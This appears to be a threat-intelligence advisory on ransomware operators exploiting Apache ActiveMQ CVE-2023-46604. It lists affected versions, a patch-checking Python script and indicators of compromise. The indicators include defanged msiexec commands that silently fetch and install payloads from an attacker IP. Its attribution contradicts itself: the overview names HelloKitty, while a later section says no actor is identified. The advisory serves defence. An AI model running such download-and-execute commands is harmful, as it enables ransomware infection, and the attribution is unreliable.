Ransomware operation exploits Apache ActiveMQ vulnerability

Target Industry

Indiscriminate, opportunistic targeting.

Overview

Intelligence indicates that a recently disclosed Apache ActiveMQ vulnerability, tracked as CVE-2023-46604 (CVSSv3.1 score: 10.0), has been exploited by HelloKitty ransomware operators. This assessment is based on the contents of the ransom note and technical analysis of the associated malware source code.

On 2nd November 2023, CVE-2023-46604 was added to the Cybersecurity & Infrastructure Security Agency (CISA) Known Exploited Vulnerability (KEV) Catalog.

Impact

It has been assessed that successful exploitation of CVE-2023-46604 would almost certainly result in threat actors gaining remote code execution capabilities on target systems.

Vulnerability Detection

Apache has released a security update for the affected product versions; any version prior to the patched releases remains vulnerable to exploitation.

Affected Products

CVE-2023-46604 affects the following Apache ActiveMQ versions:

Apache ActiveMQ 5.18.0 before 5.18.3

Apache ActiveMQ 5.17.0 before 5.17.6

Apache ActiveMQ 5.16.0 before 5.16.7

Apache ActiveMQ before 5.15.16

Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3

Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6

Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7

Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16

Containment, Mitigations & Remediations

It is strongly recommended that users of the affected product versions apply the released Apache security update. The fix is included in ActiveMQ versions 5.15.16, 5.16.7, 5.17.6 and 5.18.3, released late last month.
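To turn the affected-version list above and the patch guidance into a repeatable inventory check, the following added example (not tooling from this bulletin or from Apache) encodes the bulletin's version ranges and classifies each host in a constructed inventory as needing the update or not. The hostnames and versions in the sample inventory are assumptions for illustration.

```python
"""Check Apache ActiveMQ versions against the CVE-2023-46604 affected ranges
listed in this bulletin. Constructed example; not tooling from the bulletin."""
from typing import Dict, List, Tuple

Version = Tuple[int, ...]


def parse_version(text: str) -> Version:
    """Turn '5.17.6' (or '5.17.6-SNAPSHOT') into a comparable tuple of ints.
    Qualifiers after '-' are dropped; missing components are treated as 0."""
    core = text.strip().split("-")[0]
    parts = [int(p) for p in core.split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


# (lowest affected version inclusive, first fixed version exclusive), taken
# from the bulletin's "Affected Products" list. The broker's "before 5.15.16"
# range has no floor; the Legacy OpenWire Module's range starts at 5.8.0.
BROKER_RANGES: List[Tuple[Version, Version]] = [
    ((5, 18, 0), (5, 18, 3)),
    ((5, 17, 0), (5, 17, 6)),
    ((5, 16, 0), (5, 16, 7)),
    ((0, 0, 0), (5, 15, 16)),
]
LEGACY_OPENWIRE_RANGES = BROKER_RANGES[:3] + [((5, 8, 0), (5, 15, 16))]


def is_affected(version: str, legacy_openwire: bool = False) -> bool:
    """True if the version lies inside any affected range; the fixed
    releases (5.15.16, 5.16.7, 5.17.6, 5.18.3) and later are excluded."""
    v = parse_version(version)
    ranges = LEGACY_OPENWIRE_RANGES if legacy_openwire else BROKER_RANGES
    return any(low <= v < fixed for low, fixed in ranges)


def triage(inventory: Dict[str, str]) -> Dict[str, str]:
    """Map host -> 'patch required' / 'not affected' for a {host: version} inventory."""
    return {host: ("patch required" if is_affected(ver) else "not affected")
            for host, ver in inventory.items()}


if __name__ == "__main__":
    # Constructed inventory (hypothetical hosts and versions).
    sample = {"mq-prod-01": "5.17.4", "mq-prod-02": "5.18.3", "mq-old-01": "5.15.12"}
    for host, status in triage(sample).items():
        print(f"{host}: {status}")
```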

Indicators of Compromise

Network Indicators:

172.245.16[.]125


URL Indicators:

hxxp[://]172.245.16[.]125/m2[.]png

hxxp[://]172.245.16[.]125/m4[.]png


File Hash Indicators (SHA-256):

M2.msi: 8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4

M4.msi: 8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0

dllloader: C3C0CF25D682E981C7CE1CC0A00FA2B8B46CCE2FA49ABE38BB412DA21DA99CB7

EncDll: 3E65437F910F1F4E93809B81C19942EF74AA250AE228CACA0B278FC523AD47C5


File Indicators:

cmd.exe /c “start msiexec /q /i hxxp://172.245.16[.]125/m4.png”

cmd.exe /c “start msiexec /q /i hxxp://172.245.16[.]125/m2.png”

Threat Landscape

Apache ActiveMQ holds a significant share of the enterprise application integration market, and the related products are used extensively by organisations across all industry sectors. Within this context, it has been assessed that cyber threat actors will almost certainly view organisations whose operations depend on these products as prime targets as they seek to meet their pre-defined objectives.

Due to CVE-2023-46604 having already been subjected to malicious cyber operations, it is of critical importance to follow the recommended remediation strategies to reduce the risk of exploitation.

Threat Group

No attribution to specific threat actors or groups has been identified at the time of writing.

Mitre Methodologies

Common Weakness Enumeration (CWE):

CWE-502: Deserialization of Untrusted Data

Further Information

Rapid7 Blog


An Intelligence Terminology Yardstick showing the likelihood of events